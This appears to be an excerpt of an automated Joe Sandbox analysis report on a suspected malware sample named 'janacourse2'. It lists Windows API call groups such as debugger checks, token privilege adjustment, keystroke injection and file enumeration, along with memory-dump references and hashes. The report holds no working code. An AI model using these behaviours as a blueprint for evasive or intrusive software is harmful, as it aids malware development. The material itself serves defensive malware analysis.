                                                                                                            • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 806657224-0
                                                                                                            • Opcode ID: 71ca21a603c42bc940fd43b5eed74ab34d5847a3f785a8e994bf9bd509b7c5ee
                                                                                                            • Instruction ID: 3aa04fe6f5a930c4b223f9f19fd3a21f93bfa5d89213eaae68d4aff2dd6efe41
                                                                                                            • Opcode Fuzzy Hash: 71ca21a603c42bc940fd43b5eed74ab34d5847a3f785a8e994bf9bd509b7c5ee
                                                                                                            • Instruction Fuzzy Hash: FD31A5B1D08285DFCB21DF6ADC8156EBBB8FF45320714425AE0D0D72A5D7359D11EB50
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,00FF5222), ref: 0101DBCE
                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0101DBDD
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0101DBEE
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0101DBFA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2695905019-0
                                                                                                            • Opcode ID: df650e0f555a96af76f05aba5ffacf151418927b0df3577da346f669a1e525d8
                                                                                                            • Instruction ID: 4750fe9ef2a02a01df119dff16373beb5f5f390ab9f715962a9852cad36d92ac
                                                                                                            • Opcode Fuzzy Hash: df650e0f555a96af76f05aba5ffacf151418927b0df3577da346f669a1e525d8
                                                                                                            • Instruction Fuzzy Hash: 9FF0EC7441191597A3306BBC9F4D4AA37AC9F01334B104B42F5F5C10E4EBF9595487D5
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 010182AA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen
                                                                                                            • String ID: ($|
                                                                                                            • API String ID: 1659193697-1631851259
                                                                                                            • Opcode ID: b2228780fbb2cd32382b3f461d4ab8dce45bbd34b4e17af89a874a2de35cee35
                                                                                                            • Instruction ID: 8867a19adc1518d5011fb31ad30748ee444769a254c286ee101210e22c423ba1
                                                                                                            • Opcode Fuzzy Hash: b2228780fbb2cd32382b3f461d4ab8dce45bbd34b4e17af89a874a2de35cee35
                                                                                                            • Instruction Fuzzy Hash: 6B323674A007059FDB28CF59C481A6AB7F0FF48310B15C5AEE99ADB3A5E774EA41CB40
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 01025CC1
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 01025D17
                                                                                                            • FindClose.KERNEL32(?), ref: 01025D5F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 3541575487-0
                                                                                                            • Opcode ID: ba50074bc3937f3d3d53b112c67b95d43c8407690b5d3d621f179556df8922fd
                                                                                                            • Instruction ID: cdd90ca96e01d2c00d38ca6e0499fe8a019ce1ea9896f9b2b481df7545bc4c6f
                                                                                                            • Opcode Fuzzy Hash: ba50074bc3937f3d3d53b112c67b95d43c8407690b5d3d621f179556df8922fd
                                                                                                            • Instruction Fuzzy Hash: A551BB746046019FD324DF28C894E9AB7E4FF49314F14859EEA9A8B3A2CB34E905CF91
                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00FE271A
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FE2724
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00FE2731
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                            • String ID:
                                                                                                            • API String ID: 3906539128-0
                                                                                                            • Opcode ID: ff05fe2eee98c580520ca5c81a6a0c0f2b12e6da27534f7527f36860ec4b8832
                                                                                                            • Instruction ID: 1a4fc8bb68a32aa02cbc7686de97eabf21585f41107b70d6d36397afb3446d33
                                                                                                            • Opcode Fuzzy Hash: ff05fe2eee98c580520ca5c81a6a0c0f2b12e6da27534f7527f36860ec4b8832
                                                                                                            • Instruction Fuzzy Hash: 0331D57490121CABCB61DF64DD8879CB7B8AF08310F5041EAE40CA7260EB349F819F44
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 010251DA
                                                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 01025238
                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 010252A1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                                                            • String ID:
                                                                                                            • API String ID: 1682464887-0
                                                                                                            • Opcode ID: 0afb903a804c613a31441ce3e2c42c3a1b962efd3d344149b9d4493aca5c2108
                                                                                                            • Instruction ID: 2a75db941b01b77ba401c4b69913703db0f4ab7728d99f79186b314c15157ff4
                                                                                                            • Opcode Fuzzy Hash: 0afb903a804c613a31441ce3e2c42c3a1b962efd3d344149b9d4493aca5c2108
                                                                                                            • Instruction Fuzzy Hash: 5B314B75A001189FDB00DF54D884EEDBBB4FF49314F188099E945AB396DB36E859CBA0
                                                                                                            APIs
                                                                                                              • Part of subcall function 00FCFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00FD0668
                                                                                                              • Part of subcall function 00FCFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00FD0685
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0101170D
                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0101173A
                                                                                                            • GetLastError.KERNEL32 ref: 0101174A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 577356006-0
                                                                                                            • Opcode ID: b72ebb88038974b96249a93ec3e733ec32b791f4d326d4e86b3bec5d3ef92f53
                                                                                                            • Instruction ID: 526310bb1d220b47d85e8ef2e27f37c50b88315f78f1109e87de01fd4f21ecaf
                                                                                                            • Opcode Fuzzy Hash: b72ebb88038974b96249a93ec3e733ec32b791f4d326d4e86b3bec5d3ef92f53
                                                                                                            • Instruction Fuzzy Hash: C311CEB2400305AFE7289F64EDC6E6ABBF9FB04714B20852EF59653245EB75BC418B20
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0101D608
                                                                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0101D645
                                                                                                            • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0101D650
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 33631002-0
                                                                                                            • Opcode ID: 1aa9634148c7c479825d483d9c85ba6f73a0733b66ab23008dc67b78f3011171
                                                                                                            • Instruction ID: 25adda8ae497e67ec2e4928290c3d9c53c4b70ec750698f318fa4540bb530ae2
                                                                                                            • Opcode Fuzzy Hash: 1aa9634148c7c479825d483d9c85ba6f73a0733b66ab23008dc67b78f3011171
                                                                                                            • Instruction Fuzzy Hash: 0D11A5B5E01228BFEB208F98DD48FAFBFBCEB49B50F104151F904E7284C2745A018BA1
                                                                                                            APIs
                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0101168C
                                                                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 010116A1
                                                                                                            • FreeSid.ADVAPI32(?), ref: 010116B1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 3429775523-0
                                                                                                            • Opcode ID: 649478a36e4aaf523900ecf54748ffd342b82e48950f9940c035adf34c883927
                                                                                                            • Instruction ID: b0faec7228f12f0484c3ec79d49745ca66106dca07cbc4d0d1802485f5e4d5c4
                                                                                                            • Opcode Fuzzy Hash: 649478a36e4aaf523900ecf54748ffd342b82e48950f9940c035adf34c883927
                                                                                                            • Instruction Fuzzy Hash: C8F06D7594130CBBEF00CFE4CA89EAEBBBCFB08200F004860F500E2180D335AA048B50
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00FE28E9,?,00FD4CBE,00FE28E9,010788B8,0000000C,00FD4E15,00FE28E9,00000002,00000000,?,00FE28E9), ref: 00FD4D09
                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00FD4CBE,00FE28E9,010788B8,0000000C,00FD4E15,00FE28E9,00000002,00000000,?,00FE28E9), ref: 00FD4D10
                                                                                                            • ExitProcess.KERNEL32 ref: 00FD4D22
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1703294689-0
                                                                                                            • Opcode ID: f691986d55b6cec82ea160ccf03058a3f0f835667d2d1bd8010292e9d01e3f6d
                                                                                                            • Instruction ID: 3d989a3454ff7be35789f0a0da5303f7ee374aa34a756082bf43ad076c5dd96c
                                                                                                            • Opcode Fuzzy Hash: f691986d55b6cec82ea160ccf03058a3f0f835667d2d1bd8010292e9d01e3f6d
                                                                                                            • Instruction Fuzzy Hash: 99E0BF75401148ABDF216F54DF49A583B6BEB41752B184015FC458B226CB3AEE41DF40
                                                                                                            APIs
                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0100D28C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: NameUser
                                                                                                            • String ID: X64
                                                                                                            • API String ID: 2645101109-893830106
                                                                                                            • Opcode ID: 7731a3ba950923721242b8eb4d7f405427b360f9639760b31bc6fcb86185c3d3
                                                                                                            • Instruction ID: f0dd8843a02c8b805f4e0db9ebd637f4b98bb49a1bacb47f41cbfb9c01a90267
                                                                                                            • Opcode Fuzzy Hash: 7731a3ba950923721242b8eb4d7f405427b360f9639760b31bc6fcb86185c3d3
                                                                                                            • Instruction Fuzzy Hash: A4D0C9B580211DEBDB90CA90D9C8EDDB37CBB14315F000155F146A2040D73495488F20
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                            • Instruction ID: 0ec09bfbf72540a9a835a91fdbcc500dca4054007af314270c8d849a4306da2f
                                                                                                            • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                            • Instruction Fuzzy Hash: F1021E71E0011A9BDF14CFA9C9806ADFBF2FF48324F29426AD919E7384D731A941DB94
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 01026918
                                                                                                            • FindClose.KERNEL32(00000000), ref: 01026961
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 2295610775-0
                                                                                                            • Opcode ID: 40a7716a254376e3936945a83ce23cc503ea04fe5927219d6bd2df71e65a0e8c
                                                                                                            • Instruction ID: 8ac45eb550a19c07d12bb6cb7a2ca200bbb13d6b0dccc26fc99f7487b9113a2e
                                                                                                            • Opcode Fuzzy Hash: 40a7716a254376e3936945a83ce23cc503ea04fe5927219d6bd2df71e65a0e8c
                                                                                                            • Instruction Fuzzy Hash: 4F11D3756042109FD710DF2AC484A56BBE4FF85328F04C699F9A98F2A2CB35EC05CB90
                                                                                                            APIs
                                                                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,01034891,?,?,00000035,?), ref: 010237E4
                                                                                                            • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,01034891,?,?,00000035,?), ref: 010237F4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 3479602957-0
                                                                                                            • Opcode ID: 856f33f9238aa253a15c7f904ce47533bca391007964fd58b389954c8bd2f67b
                                                                                                            • Instruction ID: c4a1cf5b9420bf9a918e24786cd695d1065fddfbeb122f205aab211972864b81
                                                                                                            • Opcode Fuzzy Hash: 856f33f9238aa253a15c7f904ce47533bca391007964fd58b389954c8bd2f67b
                                                                                                            • Instruction Fuzzy Hash: 47F0ECB46052296BEB3016664D4DFEB3A9DFFC4761F000165F509D2185D5645904C7B0
                                                                                                            APIs
                                                                                                            • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0101B25D
                                                                                                            • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0101B270
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InputSendkeybd_event
                                                                                                            • String ID:
                                                                                                            • API String ID: 3536248340-0
                                                                                                            • Opcode ID: dae189ebb16458f75a4f2225401deae46132971060294723a1e3d19c5de79267
                                                                                                            • Instruction ID: 55a05f3a71d5ecbbf4bb9aa5805449efb8ca92322e46e6b44d37b649ea165e0e
                                                                                                            • Opcode Fuzzy Hash: dae189ebb16458f75a4f2225401deae46132971060294723a1e3d19c5de79267
                                                                                                            • Instruction Fuzzy Hash: 56F06D7480424DABEB158FA0C805BEE7FB0FF04305F008009F991A5195C37D82058F94
                                                                                                            APIs
                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,010111FC), ref: 010110D4
                                                                                                            • CloseHandle.KERNEL32(?,?,010111FC), ref: 010110E9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 81990902-0
                                                                                                            • Opcode ID: ee15002cf0ccf1a4f0048570e845a31ad9c46faa328aaa69ffa562cae7131913
                                                                                                            • Instruction ID: 01fa13f55269a1594a00b28faeed41018438937d756e13779c0d37ea07b08d75
                                                                                                            • Opcode Fuzzy Hash: ee15002cf0ccf1a4f0048570e845a31ad9c46faa328aaa69ffa562cae7131913
                                                                                                            • Instruction Fuzzy Hash: 52E04F72005611AFF7352B21FE06F73BBE9EB04310B10882DF5A6804B5DB666C90EB10
                                                                                                            Strings
                                                                                                            • Variable is not of type 'Object'., xrefs: 01000C40
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                             • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                             • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
